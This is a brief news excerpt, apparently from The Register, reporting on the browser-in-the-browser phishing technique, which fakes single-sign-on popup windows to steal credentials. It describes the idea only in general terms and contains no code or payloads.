New Browser-in-the-Browser attack could be used for phishing

A novel way of tricking people out of their passwords has left us wondering if there’s a need to rethink how much we trust our web browsers to protect us and to accelerate efforts to close web security gaps.

Earlier this week, an infosec researcher known as mr.d0x described a browser-in-the-browser (BitB) attack. It’s a way to steal login credentials by simulating the little browser windows that Google, Microsoft, and other authentication service providers pop up that ask you for your username and password to continue. You’ve probably seen these windows: you click on something like a “Sign in with Microsoft” button on a website, and popup appears asking for your credentials to access your account or profile.

Services like Google Sign-In will display a Google URL in the popup window navigation bar, which offers some reassurance that the login service is actually coming from a trusted company and not an unknown one.

Read more…
Source: The Register